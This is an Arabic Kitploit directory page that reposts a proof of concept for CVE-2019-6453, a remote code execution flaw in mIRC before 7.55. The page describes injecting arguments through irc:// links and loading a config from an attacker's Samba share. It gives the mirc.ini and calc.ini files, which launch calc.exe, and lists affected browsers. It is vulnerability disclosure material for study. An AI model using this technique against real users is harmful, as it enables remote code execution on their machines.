Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2019-6453-poc — إثبات تشغيل calc لـ CVE-2019-6453 | Kitploit
أدوات/GitHubGitHub/proofofcalc/cve-2019-6453-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubproofofcalc/cve-2019-6453-poc

cve-2019-6453-poc

إثبات تشغيل calc لـ CVE-2019-6453

عرض المستودع
481254منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-6453: RCE على mIRC <7.55 باستخدام حقن الوسائط عبر معالجات بروتوكول URI المخصصة

وجدنا ثغرة تنفيذ تعليمات برمجية عن بُعد في mIRC عبر معالج بروتوكول URI irc://. ولأن mIRC لا يستخدم أي نوع من الرموز مثل -- لتحديد نهاية قائمة الوسائط، يمكن للمهاجم تمرير وسائط إلى mIRC عبر رابط irc:// وتنفيذ تعليمات برمجية عشوائية عن طريق تحميل ملف mirc.ini مخصص من خادم Samba يتحكم فيه المهاجم. يُرجى ملاحظة أن ircs:// يعمل بنفس الطريقة.

إثبات المفهوم

يتطلب إثبات المفهوم ثلاثة ملفات: mirc.ini وcalc.ini وpoc.html. نفترض أن خادم Samba يعمل على جانب المهاجم. من أجل هذا المثال، تفترض الأجزاء البرمجية التالية أنه يعمل على المضيف 127.0.0.1 (أي استبدل 127.0.0.1 بعنوان خادمك الخاص في الملفات التالية لتجربة ذلك).

mirc.ini

mirc.ini هو ملف إعدادات مخصص يجب أن يكون موجودًا في المسار C:\mirc-poc\mirc.ini على خادم الملفات.

root@kitploit:~
[rfiles]
n2=\\127.0.0.1\C$\mirc-poc\calc.ini

calc.ini

calc.ini هو ملف سكربت بعيد يجب أن يكون موجودًا في المسار C:\mirc-poc\calc.ini على خادم الملفات.

root@kitploit:~
[script]
n0=on *:START: {
n1=  /run calc.exe
n2=}

poc.html

مجرد زيارة poc.html يجب أن ينجح بافتراض أن mIRC معيّن كمعالج افتراضي لمخطط URI irc:// وأن المتصفح لا يرمّز الحمولة. اعتمادًا على المتصفح وإعداداتك، قد تظهر لك رسالة مطالبة (ليس هذا هو الحال في Firefox).

root@kitploit:~

GIF إثبات المفهوم

GIF إثبات المفهوم

الإصدارات المتأثرة

يعمل إثبات المفهوم هذا على mIRC <7.55.

يمكنك تشغيل إثبات المفهوم على Edge 42.17134 (آخر إصدار معاينة) وFirefox 64.0.2 (آخر إصدار). لا يعمل على Chrome بسبب طريقة تعامل Chrome مع بروتوكولات URI (يتم ترميز URI قبل تمريره إلى التطبيق).

المؤلفون

  • Baptiste Devigne (Geluchat) وBenjamin Chetioui (SIben)
تنزيل الأداة